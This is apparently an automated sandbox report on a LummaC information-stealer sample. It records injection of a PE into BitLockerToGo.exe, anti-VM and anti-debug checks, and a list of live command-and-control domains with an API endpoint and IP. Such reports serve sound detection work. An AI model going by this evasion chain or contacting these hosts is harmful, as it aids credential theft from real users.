Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A5850 5_2_029A5850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02971870 5_2_02971870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296A940 5_2_0296A940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298EE86 5_2_0298EE86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02967E20 5_2_02967E20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02973F86 5_2_02973F86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02992FA9 5_2_02992FA9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296AFD0 5_2_0296AFD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298BF1C 5_2_0298BF1C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0299EF10 5_2_0299EF10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296BF70 5_2_0296BF70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02996C90 5_2_02996C90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A9CF0 5_2_029A9CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298ECF4 5_2_0298ECF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A9C00 5_2_029A9C00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A4D00 5_2_029A4D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02969D78 5_2_02969D78
Found potential string decryption / allocating functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0296CAF0 appears 55 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0297D8A0 appears 164 times
PE file contains more sections than normal
Source: iq2HxA0SLw.exe Static PE information: Number of sections : 12 > 10
Sample file is different than original file name gathered from version info
Source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe, 00000000.00000002.1864836224.00007FF6A9EAF000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe Binary or memory string: OriginalFileName vs iq2HxA0SLw.exe
Yara signature match
Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine Classification label: mal100.troj.evad.winEXE@3/0@2/1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0299FAD0 CoCreateInstance, 5_2_0299FAD0
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe File created: C:\Users\Public\Libraries\faboa.scif Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe File opened: C:\Windows\system32\74a18233676dde97608ee6471dc0c9b5cb8eb3e6e4c279aabd8f7060ccfe423dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: iq2HxA0SLw.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: iq2HxA0SLw.exe ReversingLabs: Detection: 58%
Source: iq2HxA0SLw.exe String found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine .localhostwsarecvmsgwsasendmsgIP addressunixpacket netGo = RIPEMD-160ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtraSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEexecerrdotSYSTEMROOT but have one_outputUSERDOMAINlocal-addrUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityequivalentHost: %s
Source: iq2HxA0SLw.exe String found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine RegSetValueExWinternal error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated
Source: iq2HxA0SLw.exe String found in binary or memory: ... omitting > closed by </add_dir_header.WithDeadline(<not Stringer>Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMaccept-charsetcontent-length{$} not at endempty wildcardparsing %q: %wNot Acceptableheap_sys_bytesSubConn(id:%d)"OUT_OF_RANGE"ALREADY_EXISTSreserved_rangefield_presenceLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeGetSystemTimesinvalid kind: \.+*?()|[]{}^$
Source: iq2HxA0SLw.exe String found in binary or memory: net/addrselect.go
Source: iq2HxA0SLw.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: iq2HxA0SLw.exe String found in binary or memory: google.golang.org/grpc@v1.64.1/internal/balancerload/load.go
Source: iq2HxA0SLw.exe String found in binary or memory: YePeApZaEl/load.go
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe File read: C:\Users\user\Desktop\iq2HxA0SLw.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\iq2HxA0SLw.exe "C:\Users\user\Desktop\iq2HxA0SLw.exe"
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: iq2HxA0SLw.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: iq2HxA0SLw.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: iq2HxA0SLw.exe Static file information: File size 19231232 > 1048576
Source: iq2HxA0SLw.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x65d200
Source: iq2HxA0SLw.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xb2da00
Source: iq2HxA0SLw.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
PE file contains sections with non-standard names
Source: iq2HxA0SLw.exe Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6336 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Checks if the current process is being debugged
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A7130 LdrInitializeThunk, 5_2_029A7130

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: covvercilverow.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: surroundeocw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: abortinoiwiam.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: pumpkinkwquo.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: priooozekw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: deallyharvenw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: defenddsouneuw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: racedsuitreow.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: pianoswimen.shop
Writes to foreign memory regions
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AA3008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Users\user\Desktop\iq2HxA0SLw.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Go Injector
Source: Yara match File source: iq2HxA0SLw.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Go Injector
Source: Yara match File source: iq2HxA0SLw.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519274 Sample: iq2HxA0SLw.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 13 racedsuitreow.shop 2->13 15 pianoswimen.shop 2->15 19 Suricata IDS alerts for network traffic 2->19 21 Found malware configuration 2->21 23 Malicious sample detected (through community Yara rule) 2->23 25 7 other signatures 2->25 7 iq2HxA0SLw.exe 2 2->7         started        signatures3 process4 signatures5 27 Writes to foreign memory regions 7->27 29 Allocates memory in foreign processes 7->29 31 Injects a PE file into a foreign processes 7->31 33 LummaC encrypted strings found 7->33 10 BitLockerToGo.exe 7->10         started        process6 dnsIp7 17 racedsuitreow.shop 104.21.37.97, 443, 49708, 49709 CLOUDFLARENETUS United States 10->17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.37.97
 racedsuitreow.shop United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
racedsuitreow.shop 104.21.37.97 true
pianoswimen.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
priooozekw.shop true
  • Avira URL Cloud: malware
 unknown
https://racedsuitreow.shop/api true
  • Avira URL Cloud: malware
 unknown
surroundeocw.shop true
  • Avira URL Cloud: malware
 unknown
racedsuitreow.shop true
  • Avira URL Cloud: malware
 unknown
pianoswimen.shop true
  • Avira URL Cloud: malware
 unknown
covvercilverow.shop true
  • Avira URL Cloud: malware
 unknown
pumpkinkwquo.shop true
  • Avira URL Cloud: malware
 unknown
abortinoiwiam.shop true
  • Avira URL Cloud: malware
 unknown
deallyharvenw.shop true
  • Avira URL Cloud: malware
 unknown
defenddsouneuw.shop true
  • Avira URL Cloud: malware
 unknown